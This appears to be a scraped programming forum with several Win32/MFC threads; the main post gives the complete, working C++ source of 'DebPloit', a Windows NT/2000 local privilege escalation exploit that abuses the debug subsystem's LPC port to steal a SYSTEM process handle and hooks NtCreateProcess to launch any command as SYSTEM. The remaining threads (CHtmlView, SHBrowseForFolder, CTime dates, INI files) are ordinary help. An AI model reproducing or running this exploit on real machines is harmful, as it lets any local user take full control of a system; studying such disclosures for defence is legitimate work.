Thanks again.
I worked around this by navigating to about:blank in OnInitialUpdate() before trying to populate the control.
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
Hello,
I hope everybody has heard about the new vulnerability, called DebPloit, in Windows NT and Windows 2000. I've written a small example that shows how code already running under a non-privileged local account can obtain SYSTEM-level (administrative) privileges — this is a local privilege escalation through a local LPC port, not a remote attack.
// debploit.cpp (Windows NT/2000)
//
// This program creates a process in the security context of the SYSTEM user.
// It uses a security hole in the Windows NT/2000 debugging subsystem
// originally discovered by Radim "EliCZ" Picha (March 9, 2002).
//
// Any local account (even Guest) can run this program and obtain SYSTEM
// privileges on the local machine, i.e. full local administrator rights.
//
// More information about this security hole can be found at http://www.anticracking.sk/EliCZ
// Microsoft was informed but still didn't release any hotfix (April 6, 2002).
// There is an unofficial hotfix that closes this security hole, you can download it from
// http://www.protect-me.com/freeware.html
//
//
// To link this program, you should have NTDLL.LIB from the DDK.
//
// (c) 2002 Ashot Oganesyan (ashot@protect-me.com)
// (c) 2002 SmartLine, Inc. (http://www.protect-me.com)
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
// NTSTATUS and the handful of native-API definitions this program needs;
// the Win32 SDK headers of the time do not expose them.
typedef LONG NTSTATUS;
#define NTAPI __stdcall
// NTSTATUS values with the sign bit clear are success or informational codes.
#define NT_SUCCESS(Status) ((LONG)(Status) >= 0)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
// Name of the debug subsystem's LPC port that StealProcessHandle() connects to.
#define DBG_SS_API_PORT_NAME L"\\DbgSsApiPort"
// DebugEventCode value of a create-process notification sent to DbgSs.
#define SS_CREATE_PROCESS_REQUEST 2
// Total size of the LPC message (sizeof(PORT_MESSAGE) is laid out to match it)
// and the DataSize value placed in the request header.
#define MAX_DBG_SS_CP_LPC_MESSAGE_SIZE 0x80
#define DBG_SS_CP_LPC_DATA_SIZE 0x38
#pragma pack(1)
// Seven-byte x86 patch written over the start of ntdll!NtCreateProcess
// in _tmain():  B8 imm32  (mov eax, address)  followed by  FF E0  (jmp eax).
// Packed so the three fields are laid out back to back as machine code.
typedef struct _ASMJUMP
{
    BYTE mov_eax;    // 0xB8
    LPVOID address;  // 32-bit immediate: target of the jump
    WORD jump_eax;   // 0xE0FF, i.e. the bytes FF E0 in memory
} ASMJUMP, *PASMJUMP;
#pragma pack()
// Native process/thread identifier pair. The fields carry PIDs/TIDs cast to
// HANDLE, not real handles (see how DebuggeeId/DebuggerId are filled in).
typedef struct _CLIENT_ID
{
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;
// LPC message sent to \DbgSsApiPort. The fields through SectionSize appear
// to form the generic LPC message header; the remainder is the DbgSs-specific
// create-process payload whose layout was recovered by reverse engineering
// (see the header comment). Only the fields assigned in StealProcessHandle()
// are known to matter; everything else is left zeroed.
typedef struct _PORT_MESSAGE {
    USHORT DataSize;              // payload bytes after the LPC header (DBG_SS_CP_LPC_DATA_SIZE)
    USHORT MessageSize;           // whole message, set to sizeof(PORT_MESSAGE)
    USHORT MessageType;
    USHORT VirtualRangesOffset;
    CLIENT_ID CallerId;
    ULONG MessageId;
    ULONG SectionSize;
    ULONG DebugEventCode;         // SS_CREATE_PROCESS_REQUEST
    ULONG Status;
    CLIENT_ID DebuggeeId;         // process whose handle is wanted (UniqueProcess = PID)
    PVOID DbgSsKmMsg;
    CLIENT_ID DebuggerId;         // this process and thread, which receive the event
    DWORD Unknown;
    HANDLE hFile;
    LPVOID ImageBase;
    ULONG DebugInfoFileOffset;
    ULONG DebugInfoSize;
    LPVOID ThreadLocalBase;
    LPTHREAD_START_ROUTINE ThreadStartAddress;
    LPVOID ImageName;
    USHORT Unicode;
    // 0x56 is this field's byte offset with 32-bit pointers; the array pads
    // the structure out to exactly MAX_DBG_SS_CP_LPC_MESSAGE_SIZE bytes.
    USHORT wImageName[(MAX_DBG_SS_CP_LPC_MESSAGE_SIZE - 0x56) / sizeof(USHORT)];
} PORT_MESSAGE, *PPORT_MESSAGE;
// Client-side shared-section descriptor for NtConnectPort. Declared only to
// give the prototype its proper type; this program always passes NULL.
typedef struct _PORT_SECTION_WRITE {
    ULONG Length;
    HANDLE SectionHandle;
    ULONG SectionOffset;
    ULONG ViewSize;
    PVOID ViewBase;
    PVOID TargetViewBase;
} PORT_SECTION_WRITE, *PPORT_SECTION_WRITE;
// Server-side shared-section descriptor for NtConnectPort. Unused here
// (NULL is passed); kept so the prototype matches the native signature.
typedef struct _PORT_SECTION_READ {
    ULONG Length;
    ULONG ViewSize;
    ULONG ViewBase;
} PORT_SECTION_READ, *PPORT_SECTION_READ;
// Counted wide string used by the native API (lengths are in bytes, not
// characters). Filled in by RtlInitUnicodeString() for the port name.
typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#ifdef __cplusplus
extern "C" {
#endif
// Native API prototypes exported by NTDLL. They are absent from the public
// SDK headers of the time; link against NTDLL.LIB from the DDK.

// Initialise a counted UNICODE_STRING from a NUL-terminated wide string.
NTSYSAPI
VOID
NTAPI
RtlInitUnicodeString (
OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
// Connect to a named LPC port. Only the first three arguments are used by
// this program; the optional section, size and connect-data arguments are
// all passed as NULL.
NTSYSAPI
NTSTATUS
NTAPI
NtConnectPort(
OUT PHANDLE PortHandle,
IN PUNICODE_STRING PortName,
IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
IN OUT PPORT_SECTION_WRITE WriteSection OPTIONAL,
IN OUT PPORT_SECTION_READ ReadSection OPTIONAL,
OUT PULONG MaxMessageSize OPTIONAL,
IN OUT PVOID ConnectData OPTIONAL,
IN OUT PULONG ConnectDataLength OPTIONAL
);
// Register the caller with the debug subsystem so that debug events (here:
// the reply to the forged create-process request) can be collected with
// WaitForDebugEvent().
NTSYSAPI
NTSTATUS
NTAPI
DbgUiConnectToDbg(VOID);
// Send a message to an LPC port without waiting for a reply; in this
// program the reply shows up as a debug event instead.
NTSYSAPI
NTSTATUS
NTAPI
NtRequestPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE RequestMessage
);
// Native equivalent of CloseHandle(), used for the port handle.
NTSYSAPI
NTSTATUS
NTAPI
NtClose(
IN HANDLE hObject
);
// Map an NTSTATUS to the closest Win32 error code, for SetLastError().
NTSYSAPI
ULONG
NTAPI
RtlNtStatusToDosError(
NTSTATUS status
);
#ifdef __cplusplus
}
#endif
// State shared with the naked hook below, which cannot take parameters.
HANDLE g_hParentProc;  // stolen handle substituted as NtCreateProcess's ParentProcess argument
DWORD g_dwFunc;        // system-service number of NtCreateProcess for the running OS version
// Replacement for ntdll!NtCreateProcess, reached through the ASMJUMP patch
// that _tmain() writes over the real stub in this process's own copy of
// ntdll (the kernel and other processes are untouched).
//
// On entry [esp] is the return address and [esp+4] the first argument, so
// [esp+16] is the fourth argument, ParentProcess. It is overwritten with the
// stolen handle in g_hParentProc, after which the system call is issued the
// way the original stub would: eax = service number, edx = pointer to the
// argument block, int 2Eh. Declared naked so no prologue disturbs the
// caller's stack layout.
void __declspec(naked)HookedNtCreateProcess()
{
_asm
{
mov eax,g_hParentProc // change parent's process handle
mov dword ptr [esp + 16],eax // ParentProcess = stolen handle
mov eax,g_dwFunc // system-service number; value depends on OS version
lea edx,dword ptr [esp + 4] // edx -> first argument, as the real stub sets it up
int 2Eh // NT/2000 system-call gate
retn 20h // __stdcall: pop the eight 4-byte arguments (8 * 4 = 0x20)
}
}
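// Obtain a process handle for dwPid through the debug subsystem's LPC port.
//
// This is the DebPloit flaw itself: DbgSs accepts an SS_CREATE_PROCESS_REQUEST
// from any client connected to \DbgSsApiPort and answers with a
// CREATE_PROCESS_DEBUG_EVENT carrying a handle to the named process, without
// verifying that the requester is entitled to debug that process. The handle
// is then re-duplicated (see below) so that it carries full access.
//
// dwPid   PID of the process whose handle is wanted.
// Returns a process handle owned by the caller (close with CloseHandle), or
// NULL on failure, in which case GetLastError() describes the failure.
HANDLE StealProcessHandle(DWORD dwPid)
{
    HANDLE hProcess = NULL;
    HANDLE hDbgSsApiPort = NULL;
    SECURITY_QUALITY_OF_SERVICE Qos;
    UNICODE_STRING usDbgSsApiPort;
    PORT_MESSAGE PortMessage;
    DEBUG_EVENT DebugEvent;
    NTSTATUS Status = STATUS_SUCCESS;
    DWORD dwWin32Error = ERROR_SUCCESS;

    Qos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
    Qos.ImpersonationLevel = SecurityImpersonation;
    Qos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;
    Qos.EffectiveOnly = TRUE;
    RtlInitUnicodeString(&usDbgSsApiPort, DBG_SS_API_PORT_NAME);

    // Connect to DbgSsApiPort; no shared section or connect data is needed.
    Status = NtConnectPort(&hDbgSsApiPort, &usDbgSsApiPort, &Qos,
                           NULL, NULL, NULL, NULL, NULL);
    if (!NT_SUCCESS(Status))
        goto cleanup;

    // Register with the debug subsystem so the reply is delivered as a
    // debug event that WaitForDebugEvent() below can pick up.
    Status = DbgUiConnectToDbg();
    if (!NT_SUCCESS(Status))
        goto cleanup;

    // Forge a create-process notification naming dwPid as the debuggee and
    // this process/thread as the debugger. All other fields stay zero.
    ZeroMemory(&PortMessage, sizeof(PORT_MESSAGE));
    PortMessage.DataSize = DBG_SS_CP_LPC_DATA_SIZE;
    PortMessage.MessageSize = sizeof(PORT_MESSAGE);
    PortMessage.DebugEventCode = SS_CREATE_PROCESS_REQUEST;
    PortMessage.DebuggeeId.UniqueProcess = (HANDLE)dwPid;
    PortMessage.DebuggerId.UniqueProcess = (HANDLE)GetCurrentProcessId();
    PortMessage.DebuggerId.UniqueThread = (HANDLE)GetCurrentThreadId();
    Status = NtRequestPort(hDbgSsApiPort, &PortMessage);
    if (!NT_SUCCESS(Status))
        goto cleanup;

    // The reply arrives as an ordinary debug event; give it one second.
    if (WaitForDebugEvent(&DebugEvent, 1000) == FALSE)
    {
        dwWin32Error = GetLastError();
        goto cleanup;
    }
    if (DebugEvent.dwDebugEventCode != CREATE_PROCESS_DEBUG_EVENT ||
        DebugEvent.u.CreateProcessInfo.hProcess == NULL)
    {
        // Some other event came in, or no handle was granted: report a
        // definite error instead of leaving a stale GetLastError() value.
        dwWin32Error = ERROR_INVALID_DATA;
        goto cleanup;
    }

    // Re-duplicate to get full access. The source handle is the
    // current-process pseudo-handle, which DuplicateHandle resolves in the
    // context of the *source process* (the stolen handle), so the copy
    // refers to the target process with the pseudo-handle's access rather
    // than whatever access the debug event happened to grant.
    if (!DuplicateHandle(DebugEvent.u.CreateProcessInfo.hProcess,
                         GetCurrentProcess(), GetCurrentProcess(),
                         &hProcess, 0, FALSE, DUPLICATE_SAME_ACCESS))
    {
        dwWin32Error = GetLastError();
        hProcess = NULL;
    }
    CloseHandle(DebugEvent.u.CreateProcessInfo.hProcess);

cleanup:
    if (hDbgSsApiPort)
        NtClose(hDbgSsApiPort);
    // Native failures are mapped to Win32 codes; Win32 failures pass through.
    if (!NT_SUCCESS(Status))
        SetLastError(RtlNtStatusToDosError(Status));
    else if (dwWin32Error != ERROR_SUCCESS)
        SetLastError(dwWin32Error);
    return hProcess;
}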
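// Program entry point.
//
//   DebPloit.exe [Parent PID] <Command Line>
//
// 1. Steals a handle to the chosen parent process (the System process by
//    default) with StealProcessHandle().
// 2. Patches this process's own copy of ntdll!NtCreateProcess so that
//    HookedNtCreateProcess() runs instead and substitutes the stolen handle
//    as the ParentProcess argument.
// 3. Starts <Command Line> with a plain CreateProcess(); the kernel creates
//    the child under the stolen parent, so it runs in that parent's
//    security context.
//
// Returns 0 when the child was started, -1 on a usage error or any failure.
int _tmain(int argc, TCHAR* argv[])
{
    UINT ProcessId = 0;
    OSVERSIONINFO VersionInfo;
    DWORD dw = 0;
    DWORD dwOldProtect = 0;
    DWORD dwIgnored = 0;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    PASMJUMP NtCreateProcessHook;
    LPTSTR lpProgramToExecute;
    BOOL bWaitForParent = FALSE;
    int rc = 0;

    // The syscall number and the System PID both depend on the OS version.
    VersionInfo.dwOSVersionInfoSize = sizeof(VersionInfo);
    if (!GetVersionEx(&VersionInfo))
    {
        printf("GetVersionEx failed - %lu\n", GetLastError());
        return -1;
    }
    // DebPloit works only on NT/W2K. dwPlatformId is an enumeration, not a
    // bit mask, so compare it rather than masking it.
    if (VersionInfo.dwPlatformId != VER_PLATFORM_WIN32_NT ||
        (VersionInfo.dwMajorVersion == 5 && VersionInfo.dwMinorVersion != 0))
    {
        printf("This program works only on Windows NT/2000\n");
        return -1;
    }

    if (argc < 2)
    {
        printf("\nUsage:\n\t DebPloit.exe [Parent PID] <Command Line>\n\n");
        printf("Parent PID - parent process (if not specified - system process will be used)\n");
        printf("Command Line - program to execute in the security context of Parent PID\n\n");
        printf("Example:\n\t DebPloit.exe cmd\n");
        printf("\t DebPloit.exe 123 cmd\n");
        return -1;
    }

    // Pick the System process PID and the NtCreateProcess system-service
    // number for this release; the service table is renumbered between
    // releases, so both are hard-coded per version.
    switch (VersionInfo.dwMajorVersion)
    {
    case 3: // NT 3.51
        ProcessId = 0x02;
        g_dwFunc = 0x1E;
        break;
    case 4: // NT 4.0
        ProcessId = 0x02;
        g_dwFunc = 0x1F;
        break;
    case 5: // W2K
        ProcessId = 0x08;
        g_dwFunc = 0x29; // 0x2A - for W2K beta;
        break;
    default:
        // Never issue int 2Eh with a guessed service number: refuse an
        // unknown release instead of continuing with ProcessId/g_dwFunc unset.
        printf("Unsupported Windows version %lu.%lu\n",
               VersionInfo.dwMajorVersion, VersionInfo.dwMinorVersion);
        return -1;
    }

    if (argc > 2)
    {
        // An explicit parent PID must parse as a non-zero unsigned number.
        if (_stscanf(argv[1], TEXT("%lu"), &dw) != 1 || dw == 0)
        {
            printf("Invalid Parent PID specified!\n");
            return -1;
        }
        lpProgramToExecute = argv[2];
        // For a parent other than the System process this program stays
        // alive until that parent exits (see the end of the function).
        if (dw != ProcessId)
            bWaitForParent = TRUE;
        ProcessId = dw;
    }
    else
        lpProgramToExecute = argv[1];

    // Get the parent's handle first so nothing is patched if that fails.
    g_hParentProc = StealProcessHandle(ProcessId);
    if (g_hParentProc == NULL)
    {
        printf("StealProcessHandle failed - %lu\n", GetLastError());
        return -1;
    }

    // Locate NtCreateProcess in this process's ntdll mapping.
    NtCreateProcessHook = (PASMJUMP)GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")), "NtCreateProcess");
    if (NtCreateProcessHook == NULL)
    {
        printf("GetProcAddress failed - %lu\n", GetLastError());
        CloseHandle(g_hParentProc);
        return -1;
    }

    // Make exactly the bytes we overwrite writable (VirtualProtect rounds
    // up to whole pages). Only this process's private copy of the page
    // changes; ntdll on disk and in other processes is untouched.
    if (!VirtualProtect(NtCreateProcessHook, sizeof(ASMJUMP),
                        PAGE_EXECUTE_READWRITE, &dwOldProtect))
    {
        printf("VirtualProtect failed - %lu\n", GetLastError());
        CloseHandle(g_hParentProc);
        return -1;
    }

    // Redirect the stub to HookedNtCreateProcess:
    //
    //     mov eax,HookedNtCreateProcess    (B8 imm32)
    //     jmp eax                          (FF E0)
    NtCreateProcessHook->mov_eax = 0xB8;
    NtCreateProcessHook->address = HookedNtCreateProcess;
    NtCreateProcessHook->jump_eax = 0xE0FF;
    FlushInstructionCache(GetCurrentProcess(), NtCreateProcessHook, sizeof(ASMJUMP));
    // Put the original page protection back; the hook stays in place and
    // remains executable.
    VirtualProtect(NtCreateProcessHook, sizeof(ASMJUMP), dwOldProtect, &dwIgnored);

    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
    ZeroMemory(&si, sizeof(STARTUPINFO));
    si.cb = sizeof(STARTUPINFO);
    // An ordinary CreateProcess() now passes through HookedNtCreateProcess,
    // so the child is created as a child of the stolen parent.
    if (CreateProcess(NULL, lpProgramToExecute, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
    {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    else
    {
        printf("CreateProcess failed - %lu\n", GetLastError());
        rc = -1;
    }

    // For a non-system parent the original author waits for that parent to
    // terminate before releasing its handle; the listing does not say why,
    // so that behaviour is kept as is.
    if (bWaitForParent)
    {
        FreeConsole();
        WaitForSingleObject(g_hParentProc, INFINITE);
    }
    CloseHandle(g_hParentProc);
    return rc;
}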
You can also download the full package from http://www.smartline.ru/software/DebPloitFix.zip
Hi
As far as I know, Microsoft has not released any patch to fix this security hole — or has it?
No — as of this thread Microsoft has not released a fix, and the unofficial SmartLine hotfix linked above is the only mitigation mentioned here. Check Microsoft's security bulletins for a later official fix before relying on that status.
Just like the system popup.
I'm amumu, and you?
SHBrowseForFolder
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
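// Let the user pick a folder (or a computer, with BIF_BROWSEFORCOMPUTER).
BROWSEINFO bi;
char szDisplayName[MAX_PATH];     // SHBrowseForFolder writes the chosen item's name here
ZeroMemory(&bi, sizeof(bi));      // every field, including ulFlags, starts out defined
bi.hwndOwner = this->m_hWnd;
bi.pidlRoot = NULL;
// Must be a writable MAX_PATH buffer: the shell writes into it when OK is
// pressed, so pointing it at a string literal faults at that moment.
bi.pszDisplayName = szDisplayName;
bi.lpszTitle = "lpszTitle";
// Assign rather than OR into an uninitialised field. Note that these two
// flags pull in opposite directions (OK is enabled for a computer with the
// first, only for a file-system folder with the second); check the SDK
// documentation and keep the one you actually need.
bi.ulFlags = BIF_BROWSEFORCOMPUTER | BIF_RETURNONLYFSDIRS;
bi.lpfn = NULL;
ITEMIDLIST* pil = SHBrowseForFolder(&bi);
if (pil != NULL)
{
    // ... use pil / szDisplayName here ...
    CoTaskMemFree(pil);   // the returned PIDL is owned by the caller
}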
That's my code; when I click OK, I get an error.
I'm amumu, and you?
I got it, thank you
I'm amumu, and you?
Hello all,
I need some help with CHtmlView.
What I need to achieve :- I am creatying an HTML file in memory and need to preview it to the user.
Current plan :- Create a temporary HTML file and open it in Internet Explorer
Alternate plan :- Create a frame window, with a CHtmlView and jump up this frame window. Now I need to transfer my in-memory HTML code into this CHtmlView. How do I do that please?
Warm regards
Buster
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
So?
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
I found that the easiest way was to create the temp html file and then navigate to that. There didn't seem to be an easier way to do it. I came across a few ideas in the ATL mailing list archives but nothing that seemed easy to implement.
Michael
If nothing else works I'll have to try that out
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
If you want to load a HTML string from memory:
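// Load an HTML string from memory into the CHtmlView's current document.
// A document must already be loaded (e.g. navigate to about:blank first);
// otherwise GetHtmlDocument() returns NULL and nothing is written.
HRESULT hr = E_FAIL;
IDispatch *pIDispatch = GetHtmlDocument();
if (pIDispatch != NULL)
{
    IHTMLDocument2 *pIDoc = NULL;
    hr = pIDispatch->QueryInterface(IID_IHTMLDocument2, (void**)&pIDoc);
    if (SUCCEEDED(hr))
    {
        IHTMLElement *pIBody = NULL;
        hr = pIDoc->get_body(&pIBody);
        if (SUCCEEDED(hr) && pIBody != NULL)
        {
            // innerHTML is parsed as live markup, so any script in the
            // string runs inside the control: only pass HTML you generated
            // yourself or have sanitised.
            hr = pIBody->put_innerHTML(_bstr_t("<b>Hello world</b>"));
            pIBody->Release();
        }
        else if (SUCCEEDED(hr))
        {
            hr = E_POINTER;   // get_body succeeded but there is no body yet
        }
        pIDoc->Release();
    }
    pIDispatch->Release();
}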
(Error handling and clean-up are left as an exercise. Also note that innerHTML is interpreted as live markup — never feed it untrusted HTML without sanitising it first.)
Thanks a lot
Nish
If I am awake and my eyes are closed, it does not necessarily mean that I am thinking of naked women.
hi
I used the DateTimePicker control and added a member variable for it, but when I call UpdateData() the problem occurs with any date before 1969-12-31. Is this a bug in VC6? Can I use this control for dates before 1969-12-31, and if so, how?
Best Regards
I use this control without any problems.
Even the year 1817 is reachable.
Your accompanying code must be the problem.
Geert.
thanx
I always get the following message:
(Debug Assertion failed!
program : file.exe
timecor.cpp
line:40)
this file (timecore.cpp)is done with vc6
Best Regards
So, what's on line 40 of timecor.cpp?
ASSERT(m_time != -1); // CTime stores a time_t; -1 is the value mktime() returns for a date it cannot represent, so this is the "illegal input time" check
Best Regards
Hi,
Your problem is that the MFC CTime class actually uses the mktime() call internally. If you look at the definition of mktime() you'll see that it works with a time_t, an integer count of seconds since, you guessed it, Jan 1 1970. The VC6 run-time's mktime() refuses dates before that epoch and returns -1, which is exactly what the ASSERT at timecore.cpp line 40 trips on. The root cause is that you're mapping your control to a CTime value. Open the ClassWizard and delete the mapped variable. Add it again, but make sure you select COleDateTime from the Variable Type combo. This should give you a much larger range of values.
Hope this helps.
------------------------
Derek Waters
derek@lj-oz.com
thanx
It is working now. Does it also work with a date field in an Access DB?
Best Regards
Well, assuming that you're using some COM-based technology to access your Access DB (and I would imagine it'd be pretty tough otherwise!) then COleDateTime can easily be converted to a VARIANT of VT_DATE type using COleVariant. This will be exactly the format that Access's automation interface will be expecting.
------------------------
Derek Waters
derek@lj-oz.com
Hi CP adepts,
By using WriteProfileXXX() you can easily save some settings of your app
to the registry OR an INI file.
But if I choose for an INI file it is always created in the %windows% directory.
I'd like to keep it in the same directory as my app.
How can I get that behaviour?
(without having to move it around myself of course)
Thanks.
You can use WritePrivateProfileXXX(), which takes an explicit INI file path. Pass a full path (for example built from GetModuleFileName()) rather than a bare file name, because a bare name is still resolved relative to the Windows directory.